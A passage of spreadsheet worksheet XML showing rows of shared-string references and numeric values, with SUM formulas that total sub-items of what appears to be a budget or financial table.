      <c r="C1397" s="34"/>
      <c r="D1397" s="10" t="s">
        <v>6103</v>
      </c>
      <c r="E1397" s="16" t="s">
        <v>4078</v>
      </c>
      <c r="F1397" s="17">
        <v>1899</v>
      </c>
    </row>
    <row r="1398" spans="1:6">
      <c r="A1398" s="10"/>
      <c r="B1398" s="10"/>
      <c r="C1398" s="34"/>
      <c r="D1398" s="10" t="s">
        <v>6104</v>
      </c>
      <c r="E1398" s="16" t="s">
        <v>4079</v>
      </c>
      <c r="F1398" s="17">
        <v>5269</v>
      </c>
    </row>
    <row r="1399" spans="1:6">
      <c r="A1399" s="10"/>
      <c r="B1399" s="10"/>
      <c r="C1399" s="34"/>
      <c r="D1399" s="10" t="s">
        <v>6105</v>
      </c>
      <c r="E1399" s="16" t="s">
        <v>4080</v>
      </c>
      <c r="F1399" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1400" spans="1:6">
      <c r="A1400" s="10"/>
      <c r="B1400" s="10"/>
      <c r="C1400" s="34"/>
      <c r="D1400" s="10" t="s">
        <v>6106</v>
      </c>
      <c r="E1400" s="16" t="s">
        <v>4081</v>
      </c>
      <c r="F1400" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1401" spans="1:6">
      <c r="A1401" s="10"/>
      <c r="B1401" s="10"/>
      <c r="C1401" s="34"/>
      <c r="D1401" s="10" t="s">
        <v>6107</v>
      </c>
      <c r="E1401" s="16" t="s">
        <v>4082</v>
      </c>
      <c r="F1401" s="17">
        <v>692</v>
      </c>
    </row>
    <row r="1402" spans="1:6">
      <c r="A1402" s="10"/>
      <c r="B1402" s="10"/>
      <c r="C1402" s="34"/>
      <c r="D1402" s="10" t="s">
        <v>6108</v>
      </c>
      <c r="E1402" s="11" t="s">
        <v>765</v>
      </c>
      <c r="F1402" s="12">
        <f>SUM(F1403:F1405)</f>
        <v>423</v>
      </c>
    </row>
    <row r="1403" spans="1:6">
      <c r="A1403" s="10"/>
      <c r="B1403" s="10"/>
      <c r="C1403" s="34"/>
      <c r="D1403" s="10" t="s">
        <v>6109</v>
      </c>
      <c r="E1403" s="16" t="s">
        <v>4083</v>
      </c>
      <c r="F1403" s="17">
        <v>327</v>
      </c>
    </row>
    <row r="1404" spans="1:6">
      <c r="A1404" s="10"/>
      <c r="B1404" s="10"/>
      <c r="C1404" s="34"/>
      <c r="D1404" s="10" t="s">
        <v>6110</v>
      </c>
      <c r="E1404" s="16" t="s">
        <v>4084</v>
      </c>
      <c r="F1404" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1405" spans="1:6">
      <c r="A1405" s="10"/>
      <c r="B1405" s="10"/>
      <c r="C1405" s="34"/>
      <c r="D1405" s="10" t="s">
        <v>6111</v>
      </c>
      <c r="E1405" s="16" t="s">
        <v>4085</v>
      </c>
      <c r="F1405" s="17">
        <v>96</v>
      </c>
    </row>
    <row r="1406" spans="1:6">
      <c r="A1406" s="10"/>
      <c r="B1406" s="10"/>
      <c r="C1406" s="34"/>
      <c r="D1406" s="10" t="s">
        <v>6112</v>
      </c>
      <c r="E1406" s="11" t="s">
        <v>766</v>
      </c>
      <c r="F1406" s="12">
        <f>SUM(F1407:F1409)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1407" spans="1:6">
      <c r="A1407" s="10"/>
      <c r="B1407" s="10"/>
      <c r="C1407" s="34"/>
      <c r="D1407" s="10" t="s">
        <v>6113</v>
      </c>
      <c r="E1407" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="F1407" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1408" spans="1:6">
      <c r="A1408" s="10"/>
      <c r="B1408" s="10"/>
      <c r="C1408" s="34"/>
      <c r="D1408" s="10" t="s">
        <v>6114</v>
      </c>
      <c r="E1408" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1408" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1409" spans="1:6">
      <c r="A1409" s="10"/>
      <c r="B1409" s="10"/>
      <c r="C1409" s="34"/>
      <c r="D1409" s="10" t="s">
        <v>6115</v>
      </c>
      <c r="E1409" s="16" t="s">
        <v>4086</v>
      </c>
      <c r="F1409" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1410" spans="1:6">
      <c r="A1410" s="10"/>
      <c r="B1410" s="10"/>
      <c r="C1410" s="34"/>
      <c r="D1410" s="10" t="s">
        <v>6116</v>
      </c>
      <c r="E1410" s="11" t="s">
        <v>767</v>
      </c>
      <c r="F1410" s="12">
        <f>SUM(F1411:F1413)</f>
        <v>61900</v>
      </c>
    </row>
    <row r="1411" spans="1:6">
      <c r="A1411" s="10"/>
      <c r="B1411" s="10"/>
      <c r="C1411" s="34"/>
      <c r="D1411" s="10" t="s">
        <v>6117</v>
      </c>
      <c r="E1411" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="F1411" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1412" spans="1:6">
      <c r="A1412" s="10"/>
      <c r="B1412" s="10"/>
      <c r="C1412" s="34"/>
      <c r="D1412" s="10" t="s">
        <v>6118</v>
      </c>
      <c r="E1412" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1412" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1413" spans="1:6">
      <c r="A1413" s="10"/>
      <c r="B1413" s="10"/>
      <c r="C1413" s="34"/>
      <c r="D1413" s="10" t="s">
        <v>6119</v>
      </c>
      <c r="E1413" s="16" t="s">
        <v>4087</v>
      </c>
      <c r="F1413" s="17">
        <v>61900</v>
      </c>
    </row>
    <row r="1414" spans="1:6">
      <c r="A1414" s="10"/>
      <c r="B1414" s="10"/>
      <c r="C1414" s="34"/>
      <c r="D1414" s="10" t="s">
        <v>6120</v>
      </c>
      <c r="E1414" s="11" t="s">
        <v>768</v>
      </c>
      <c r="F1414" s="12">
        <f>SUM(F1415:F1419)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1415" spans="1:6">
      <c r="A1415" s="10"/>
      <c r="B1415" s="10"/>
      <c r="C1415" s="34"/>
      <c r="D1415" s="10" t="s">
        <v>6121</v>
      </c>
      <c r="E1415" s="16" t="s">
        <v>4078</v>
      </c>
      <c r="F1415" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1416" spans="1:6">
      <c r="A1416" s="10"/>
      <c r="B1416" s="10"/>
      <c r="C1416" s="34"/>
      <c r="D1416" s="10" t="s">
        <v>6122</v>
      </c>
      <c r="E1416" s="16" t="s">
        <v>4079</v>
      </c>
      <c r="F1416" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1417" spans="1:6">
      <c r="A1417" s="10"/>
      <c r="B1417" s="10"/>
      <c r="C1417" s="34"/>
      <c r="D1417" s="10" t="s">
        <v>6123</v>
      </c>
      <c r="E1417" s="16" t="s">
        <v>4080</v>
      </c>
      <c r="F1417" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1418" spans="1:6">
      <c r="A1418" s="10"/>
      <c r="B1418" s="10"/>
      <c r="C1418" s="34"/>
      <c r="D1418" s="10" t="s">
        <v>6124</v>
      </c>
      <c r="E1418" s="16" t="s">
        <v>4081</v>
      </c>
      <c r="F1418" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1419" spans="1:6">
      <c r="A1419" s="10"/>
      <c r="B1419" s="10"/>
      <c r="C1419" s="34"/>
      <c r="D1419" s="10" t="s">
        <v>6125</v>
      </c>
      <c r="E1419" s="16" t="s">
        <v>4088</v>
      </c>
      <c r="F1419" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1420" spans="1:6">
      <c r="A1420" s="10"/>
      <c r="B1420" s="10"/>
      <c r="C1420" s="34"/>
      <c r="D1420" s="10" t="s">
        <v>6126</v>
      </c>
      <c r="E1420" s="11" t="s">
        <v>769</v>
      </c>
      <c r="F1420" s="12">
        <f>SUM(F1421:F1422)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1421" spans="1:6">
      <c r="A1421" s="10"/>
      <c r="B1421" s="10"/>
      <c r="C1421" s="34"/>
      <c r="D1421" s="10" t="s">
        <v>6127</v>
      </c>
      <c r="E1421" s="16" t="s">
        <v>4083</v>
      </c>
      <c r="F1421" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1422" spans="1:6">
      <c r="A1422" s="10"/>
      <c r="B1422" s="10"/>
      <c r="C1422" s="34"/>
      <c r="D1422" s="10" t="s">
        <v>6128</v>
      </c>
      <c r="E1422" s="16" t="s">
        <v>4089</v>
      </c>
      <c r="F1422" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1423" spans="1:6">
      <c r="A1423" s="10"/>
      <c r="B1423" s="10"/>
      <c r="C1423" s="34"/>
      <c r="D1423" s="10" t="s">
        <v>6129</v>
      </c>
      <c r="E1423" s="11" t="s">
        <v>770</v>
      </c>
      <c r="F1423" s="12">
        <f>SUM(F1424:F1431)</f>
        <v>18900</v>
      </c>
    </row>
    <row r="1424" spans="1:6">
      <c r="A1424" s="10"/>
      <c r="B1424" s="10"/>
      <c r="C1424" s="34"/>
      <c r="D1424" s="10" t="s">
        <v>6130</v>
      </c>
      <c r="E1424" s="16" t="s">
        <v>4066</v>
      </c>
      <c r="F1424" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1425" spans="1:6">
      <c r="A1425" s="10"/>
      <c r="B1425" s="10"/>
      <c r="C1425" s="34"/>
      <c r="D1425" s="10" t="s">
        <v>6131</v>
      </c>
      <c r="E1425" s="16" t="s">
        <v>4067</v>
      </c>
      <c r="F1425" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1426" spans="1:6">
      <c r="A1426" s="10"/>
      <c r="B1426" s="10"/>
      <c r="C1426" s="34"/>
      <c r="D1426" s="10" t="s">
        <v>6132</v>
      </c>
      <c r="E1426" s="16" t="s">
        <v>4068</v>
      </c>
      <c r="F1426" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1427" spans="1:6">
      <c r="A1427" s="10"/>
      <c r="B1427" s="10"/>
      <c r="C1427" s="34"/>
      <c r="D1427" s="10" t="s">
        <v>6133</v>
      </c>
      <c r="E1427" s="16" t="s">
        <v>4069</v>
      </c>
      <c r="F1427" s="17">
        <v>2000</v>
      </c>
    </row>
    <row r="1428" spans="1:6">
      <c r="A1428" s="10"/>
      <c r="B1428" s="10"/>
      <c r="C1428" s="34"/>
      <c r="D1428" s="10" t="s">
        <v>6134</v>
      </c>
      <c r="E1428" s="16" t="s">
        <v>4072</v>
      </c>
      <c r="F1428" s="33">
        <v>0</v>
      </c>
    </row>
    <row r="1429" spans="1:6">
      <c r="A1429" s="10"/>
      <c r="B1429" s="10"/>
      <c r="C1429" s="34"/>
      <c r="D1429" s="10" t="s">
        <v>6135</v>
      </c>
      <c r="E1429" s="16" t="s">
        <v>4074</v>
      </c>
      <c r="F1429" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1430" spans="1:6">
      <c r="A1430" s="10"/>
      <c r="B1430" s="10"/>
      <c r="C1430" s="34"/>
      <c r="D1430" s="10" t="s">
        <v>6136</v>
      </c>
      <c r="E1430" s="16" t="s">
        <v>4075</v>
      </c>
      <c r="F1430" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="1431" spans="1:6">
      <c r="A1431" s="10"/>
      <c r="B1431" s="10"/>
      <c r="C1431" s="34"/>
      <c r="D1431" s="10" t="s">
        <v>6137</v>
      </c>
      <c r="E1431" s="16" t="s">
        <v>4090</v>
      </c>
      <c r="F1431" s="17">
        <v>16900</v>
      </c>
    </row>
    <row r="1432" spans="1:6">
      <c r="A1432" s="10"/>
      <c r="B1432" s="10"/>
      <c r="C1432" s="34"/>
      <c r="D1432" s="10" t="s">
        <v>5562</v>
      </c>
      <c r="E1432" s="11" t="s">
        <v>3639</v>
      </c>
      <c r="F1432" s="12">
        <f>F1433+F1438+F1443+F1448+F1451</f>
        <v>0</v>
      </c>
    </row>
    <row r="1433" spans="1:6">
      <c r="A1433" s="10"/>
      <c r="B1433" s="10"/>
      <c r="C1433" s="34"/>
      <c r="D1433" s="10" t="s">
        <v>6138</v>
      </c>
      <c r="E1433" s="11" t="s">
        <v>4091</v>
      </c>
      <c r="F1433" s="12">
        <f>SUM(F1434:F1437)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1434" spans="1:6">
      <c r="A1434" s="10"/>
      <c r="B1434" s="10"/>
      <c r="C1434" s="34"/>
      <c r="D1434" s="10" t="s">
        <v>6139</v>
      </c>
      <c r="E1434" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="F1434" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1435" spans="1:6">
      <c r="A1435" s="10"/>
      <c r="B1435" s="10"/>
      <c r="C1435" s="34"/>
      <c r="D1435" s="10" t="s">
        <v>6140</v>
      </c>
      <c r="E1435" s="16" t="s">
        <v>4092</v>
      </c>
      <c r="F1435" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1436" spans="1:6">
      <c r="A1436" s="10"/>
      <c r="B1436" s="10"/>
      <c r="C1436" s="34"/>
      <c r="D1436" s="10" t="s">
        <v>6141</v>
      </c>
      <c r="E1436" s="16" t="s">
        <v>4093</v>
      </c>
      <c r="F1436" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1437" spans="1:6">
      <c r="A1437" s="10"/>
      <c r="B1437" s="10"/>
      <c r="C1437" s="34"/>
      <c r="D1437" s="10" t="s">
        <v>6142</v>
      </c>
      <c r="E1437" s="16" t="s">
        <v>4094</v>
      </c>
      <c r="F1437" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1438" spans="1:6">
      <c r="A1438" s="10"/>
      <c r="B1438" s="10"/>
      <c r="C1438" s="34"/>
      <c r="D1438" s="10" t="s">
        <v>6143</v>
      </c>
      <c r="E1438" s="11" t="s">
        <v>4095</v>
      </c>
      <c r="F1438" s="12">
        <f>SUM(F1439:F1442)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1439" spans="1:6">
      <c r="A1439" s="10"/>
      <c r="B1439" s="10"/>
      <c r="C1439" s="34"/>
      <c r="D1439" s="10" t="s">
        <v>6144</v>
      </c>
      <c r="E1439" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="F1439" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1440" spans="1:6">
      <c r="A1440" s="10"/>
      <c r="B1440" s="10"/>
      <c r="C1440" s="34"/>
      <c r="D1440" s="10" t="s">
        <v>6145</v>
      </c>
      <c r="E1440" s="16" t="s">
        <v>4092</v>
      </c>
      <c r="F1440" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1441" spans="1:6">
      <c r="A1441" s="10"/>
      <c r="B1441" s="10"/>
      <c r="C1441" s="34"/>
      <c r="D1441" s="10" t="s">
        <v>6146</v>
      </c>
      <c r="E1441" s="16" t="s">
        <v>4096</v>
      </c>
      <c r="F1441" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1442" spans="1:6">
      <c r="A1442" s="10"/>
      <c r="B1442" s="10"/>
      <c r="C1442" s="34"/>
      <c r="D1442" s="10" t="s">
        <v>6147</v>
      </c>
      <c r="E1442" s="16" t="s">
        <v>4097</v>
      </c>
      <c r="F1442" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1443" spans="1:6">
      <c r="A1443" s="10"/>
      <c r="B1443" s="10"/>
      <c r="C1443" s="34"/>
      <c r="D1443" s="10" t="s">
        <v>6148</v>
      </c>
      <c r="E1443" s="11" t="s">
        <v>4098</v>
      </c>
      <c r="F1443" s="12">
        <f>SUM(F1444:F1447)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1444" spans="1:6">
      <c r="A1444" s="10"/>
      <c r="B1444" s="10"/>
      <c r="C1444" s="34"/>
      <c r="D1444" s="10" t="s">
        <v>6149</v>
      </c>
      <c r="E1444" s="16" t="s">
        <v>3704</v>
      </c>
      <c r="F1444" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1445" spans="1:6">
      <c r="A1445" s="10"/>
      <c r="B1445" s="10"/>
      <c r="C1445" s="34"/>
      <c r="D1445" s="10" t="s">
        <v>6150</v>
      </c>
      <c r="E1445" s="16" t="s">
        <v>4099</v>
      </c>
      <c r="F1445" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1446" spans="1:6">
      <c r="A1446" s="10"/>
      <c r="B1446" s="10"/>
      <c r="C1446" s="34"/>
      <c r="D1446" s="10" t="s">
        <v>6151</v>
      </c>
      <c r="E1446" s="16" t="s">
        <v>4100</v>
      </c>
      <c r="F1446" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1447" spans="1:6">
      <c r="A1447" s="10"/>
      <c r="B1447" s="10"/>
      <c r="C1447" s="34"/>
      <c r="D1447" s="10" t="s">
        <v>6152</v>
      </c>
      <c r="E1447" s="16" t="s">
        <v>4101</v>
      </c>
      <c r="F1447" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1448" spans="1:6">
      <c r="A1448" s="10"/>
      <c r="B1448" s="10"/>
      <c r="C1448" s="34"/>
      <c r="D1448" s="10" t="s">
        <v>6153</v>
      </c>
      <c r="E1448" s="11" t="s">
        <v>4102</v>
      </c>
      <c r="F1448" s="12">
        <f>SUM(F1449:F1450)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1449" spans="1:6">
      <c r="A1449" s="10"/>
      <c r="B1449" s="10"/>
      <c r="C1449" s="34"/>
      <c r="D1449" s="10" t="s">
        <v>6154</v>
      </c>
      <c r="E1449" s="16" t="s">
        <v>4052</v>
      </c>
      <c r="F1449" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1450" spans="1:6">
      <c r="A1450" s="10"/>
      <c r="B1450" s="10"/>
      <c r="C1450" s="34"/>
      <c r="D1450" s="10" t="s">
        <v>6155</v>
      </c>
      <c r="E1450" s="16" t="s">
        <v>4103</v>
      </c>
      <c r="F1450" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1451" spans="1:6">
      <c r="A1451" s="10"/>
      <c r="B1451" s="10"/>
      <c r="C1451" s="34"/>
      <c r="D1451" s="10" t="s">
        <v>6156</v>
      </c>
      <c r="E1451" s="11" t="s">
        <v>4104</v>
      </c>
      <c r="F1451" s="12">
        <f>SUM(F1452:F1455)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1452" spans="1:6">
      <c r="A1452" s="10"/>
      <c r="B1452" s="10"/>
      <c r="C1452" s="34"/>
      <c r="D1452" s="10" t="s">
        <v>6157</v>
      </c>
      <c r="E1452" s="16" t="s">
        <v>3704</v>
      </c>
      <c r="F1452" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1453" spans="1:6">
      <c r="A1453" s="10"/>
      <c r="B1453" s="10"/>
      <c r="C1453" s="34"/>
      <c r="D1453" s="10" t="s">
        <v>6158</v>
      </c>
      <c r="E1453" s="16" t="s">
        <v>4105</v>
      </c>
      <c r="F1453" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1454" spans="1:6">
      <c r="A1454" s="10"/>
      <c r="B1454" s="10"/>
      <c r="C1454" s="34"/>
      <c r="D1454" s="10" t="s">
        <v>6159</v>
      </c>
      <c r="E1454" s="16" t="s">
        <v>4100</v>
      </c>
      <c r="F1454" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1455" spans="1:6">
      <c r="A1455" s="10"/>
      <c r="B1455" s="10"/>
      <c r="C1455" s="34"/>
      <c r="D1455" s="10" t="s">
        <v>6160</v>
      </c>
      <c r="E1455" s="16" t="s">
        <v>4106</v>
      </c>
      <c r="F1455" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1456" spans="1:6">
      <c r="A1456" s="10"/>
      <c r="B1456" s="10"/>
      <c r="C1456" s="34"/>
      <c r="D1456" s="10" t="s">
        <v>5673</v>
      </c>
      <c r="E1456" s="11" t="s">
        <v>3735</v>
      </c>
      <c r="F1456" s="12">
        <f>F1457+F1462+F1467+F1472+F1481+F1488+F1497+F1500+F1503+F1504</f>
        <v>0</v>
      </c>
    </row>
    <row r="1457" spans="1:6">
      <c r="A1457" s="10"/>
      <c r="B1457" s="10"/>
      <c r="C1457" s="34"/>
      <c r="D1457" s="10" t="s">
        <v>6161</v>
      </c>
      <c r="E1457" s="11" t="s">
        <v>571</v>
      </c>
      <c r="F1457" s="12">
        <f>SUM(F1458:F1461)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1458" spans="1:6">
      <c r="A1458" s="10"/>
      <c r="B1458" s="10"/>
      <c r="C1458" s="34"/>
      <c r="D1458" s="10" t="s">
        <v>6162</v>
      </c>
      <c r="E1458" s="16" t="s">
        <v>3737</v>
      </c>
      <c r="F1458" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1459" spans="1:6">
      <c r="A1459" s="10"/>
      <c r="B1459" s="10"/>
      <c r="C1459" s="34"/>
      <c r="D1459" s="10" t="s">
        <v>6163</v>
      </c>
      <c r="E1459" s="16" t="s">
        <v>3738</v>
      </c>
      <c r="F1459" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1460" spans="1:6">
      <c r="A1460" s="10"/>
      <c r="B1460" s="10"/>
      <c r="C1460" s="34"/>
      <c r="D1460" s="10" t="s">
        <v>6164</v>
      </c>
      <c r="E1460" s="16" t="s">
        <v>4107</v>
      </c>
      <c r="F1460" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1461" spans="1:6">
      <c r="A1461" s="10"/>
      <c r="B1461" s="10"/>
      <c r="C1461" s="34"/>
      <c r="D1461" s="10" t="s">
        <v>6165</v>
      </c>
      <c r="E1461" s="16" t="s">
        <v>4108</v>
      </c>
      <c r="F1461" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1462" spans="1:6">
      <c r="A1462" s="10"/>
      <c r="B1462" s="10"/>
      <c r="C1462" s="34"/>
      <c r="D1462" s="10" t="s">
        <v>6166</v>
      </c>
      <c r="E1462" s="11" t="s">
        <v>572</v>
      </c>
      <c r="F1462" s="12">
        <f>SUM(F1463:F1466)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1463" spans="1:6">
      <c r="A1463" s="10"/>
      <c r="B1463" s="10"/>
      <c r="C1463" s="34"/>
      <c r="D1463" s="10" t="s">
        <v>6167</v>
      </c>
      <c r="E1463" s="16" t="s">
        <v>4107</v>
      </c>
      <c r="F1463" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1464" spans="1:6">
      <c r="A1464" s="10"/>
      <c r="B1464" s="10"/>
      <c r="C1464" s="34"/>
      <c r="D1464" s="10" t="s">
        <v>6168</v>
      </c>
      <c r="E1464" s="16" t="s">
        <v>4109</v>
      </c>
      <c r="F1464" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1465" spans="1:6">
      <c r="A1465" s="10"/>
      <c r="B1465" s="10"/>
      <c r="C1465" s="34"/>
      <c r="D1465" s="10" t="s">
        <v>6169</v>
      </c>
      <c r="E1465" s="16" t="s">
        <v>4110</v>
      </c>
      <c r="F1465" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1466" spans="1:6">
      <c r="A1466" s="10"/>
      <c r="B1466" s="10"/>
      <c r="C1466" s="34"/>
      <c r="D1466" s="10" t="s">
        <v>6170</v>
      </c>
      <c r="E1466" s="16" t="s">
        <v>4111</v>
      </c>
      <c r="F1466" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1467" spans="1:6">
      <c r="A1467" s="10"/>
      <c r="B1467" s="10"/>
      <c r="C1467" s="34"/>
      <c r="D1467" s="10" t="s">
        <v>6171</v>
      </c>
      <c r="E1467" s="11" t="s">
        <v>573</v>
      </c>
      <c r="F1467" s="12">
        <f>SUM(F1468:F1471)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1468" spans="1:6">
      <c r="A1468" s="10"/>
      <c r="B1468" s="10"/>
      <c r="C1468" s="34"/>
      <c r="D1468" s="10" t="s">
        <v>6172</v>
      </c>
      <c r="E1468" s="16" t="s">
        <v>3744</v>
      </c>
      <c r="F1468" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1469" spans="1:6">
      <c r="A1469" s="10"/>
      <c r="B1469" s="10"/>
      <c r="C1469" s="34"/>
      <c r="D1469" s="10" t="s">
        <v>6173</v>
      </c>
      <c r="E1469" s="16" t="s">
        <v>4112</v>
      </c>
      <c r="F1469" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1470" spans="1:6">
      <c r="A1470" s="10"/>
      <c r="B1470" s="10"/>
      <c r="C1470" s="34"/>
      <c r="D1470" s="10" t="s">
        <v>6174</v>
      </c>
      <c r="E1470" s="16" t="s">
        <v>4113</v>
      </c>
      <c r="F1470" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1471" spans="1:6">
      <c r="A1471" s="10"/>
      <c r="B1471" s="10"/>
      <c r="C1471" s="34"/>
      <c r="D1471" s="10" t="s">
        <v>6175</v>
      </c>
      <c r="E1471" s="16" t="s">
        <v>4114</v>
      </c>
      <c r="F1471" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1472" spans="1:6">
      <c r="A1472" s="10"/>
      <c r="B1472" s="10"/>
      <c r="C1472" s="34"/>
      <c r="D1472" s="10" t="s">
        <v>6176</v>
      </c>
      <c r="E1472" s="11" t="s">
        <v>574</v>
      </c>
      <c r="F1472" s="12">
        <f>SUM(F1473:F1480)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1473" spans="1:6">
      <c r="A1473" s="10"/>
      <c r="B1473" s="10"/>
      <c r="C1473" s="34"/>
      <c r="D1473" s="10" t="s">
        <v>6177</v>
      </c>
      <c r="E1473" s="16" t="s">
        <v>4115</v>
      </c>
      <c r="F1473" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1474" spans="1:6">
      <c r="A1474" s="10"/>
      <c r="B1474" s="10"/>
      <c r="C1474" s="34"/>
      <c r="D1474" s="10" t="s">
        <v>6178</v>
      </c>
      <c r="E1474" s="16" t="s">
        <v>4116</v>
      </c>
      <c r="F1474" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1475" spans="1:6">
      <c r="A1475" s="10"/>
      <c r="B1475" s="10"/>
      <c r="C1475" s="34"/>
      <c r="D1475" s="10" t="s">
        <v>6179</v>
      </c>
      <c r="E1475" s="16" t="s">
        <v>4117</v>
      </c>
      <c r="F1475" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1476" spans="1:6">
      <c r="A1476" s="10"/>
      <c r="B1476" s="10"/>
      <c r="C1476" s="34"/>
      <c r="D1476" s="10" t="s">
        <v>6180</v>
      </c>
      <c r="E1476" s="16" t="s">
        <v>4118</v>
      </c>
      <c r="F1476" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1477" spans="1:6">
      <c r="A1477" s="10"/>
      <c r="B1477" s="10"/>
      <c r="C1477" s="34"/>
      <c r="D1477" s="10" t="s">
        <v>6181</v>
      </c>
      <c r="E1477" s="16" t="s">
        <v>4119</v>
      </c>
      <c r="F1477" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1478" spans="1:6">
      <c r="A1478" s="10"/>
      <c r="B1478" s="10"/>
      <c r="C1478" s="34"/>
      <c r="D1478" s="10" t="s">
        <v>6182</v>
      </c>
      <c r="E1478" s="16" t="s">
        <v>4120</v>
      </c>
      <c r="F1478" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1479" spans="1:6">
      <c r="A1479" s="10"/>
      <c r="B1479" s="10"/>
      <c r="C1479" s="34"/>
      <c r="D1479" s="10" t="s">
        <v>6183</v>
      </c>
      <c r="E1479" s="16" t="s">
        <v>4121</v>
      </c>
      <c r="F1479" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1480" spans="1:6">
      <c r="A1480" s="10"/>
      <c r="B1480" s="10"/>
      <c r="C1480" s="34"/>
      <c r="D1480" s="10" t="s">
        <v>6184</v>
      </c>
      <c r="E1480" s="16" t="s">
        <v>4122</v>
      </c>
      <c r="F1480" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1481" spans="1:6">
      <c r="A1481" s="10"/>
      <c r="B1481" s="10"/>
      <c r="C1481" s="34"/>
      <c r="D1481" s="10" t="s">
        <v>6185</v>
      </c>
      <c r="E1481" s="11" t="s">
        <v>575</v>
      </c>
      <c r="F1481" s="12">
        <f>SUM(F1482:F1487)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1482" spans="1:6">
      <c r="A1482" s="10"/>
      <c r="B1482" s="10"/>
      <c r="C1482" s="34"/>
      <c r="D1482" s="10" t="s">
        <v>6186</v>
      </c>
      <c r="E1482" s="16" t="s">
        <v>4123</v>
      </c>
      <c r="F1482" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1483" spans="1:6">
      <c r="A1483" s="10"/>
      <c r="B1483" s="10"/>
      <c r="C1483" s="34"/>
      <c r="D1483" s="10" t="s">
        <v>6187</v>
      </c>
      <c r="E1483" s="16" t="s">
        <v>4124</v>
      </c>
      <c r="F1483" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1484" spans="1:6">
      <c r="A1484" s="10"/>
      <c r="B1484" s="10"/>
      <c r="C1484" s="34"/>
      <c r="D1484" s="10" t="s">
        <v>6188</v>
      </c>
      <c r="E1484" s="16" t="s">
        <v>4125</v>
      </c>
      <c r="F1484" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1485" spans="1:6">
      <c r="A1485" s="10"/>
      <c r="B1485" s="10"/>
      <c r="C1485" s="34"/>
      <c r="D1485" s="10" t="s">
        <v>6189</v>
      </c>
      <c r="E1485" s="16" t="s">
        <v>4126</v>
      </c>
      <c r="F1485" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1486" spans="1:6">
      <c r="A1486" s="10"/>
      <c r="B1486" s="10"/>
      <c r="C1486" s="34"/>
      <c r="D1486" s="10" t="s">
        <v>6190</v>
      </c>
      <c r="E1486" s="16" t="s">
        <v>4127</v>
      </c>
      <c r="F1486" s="17">
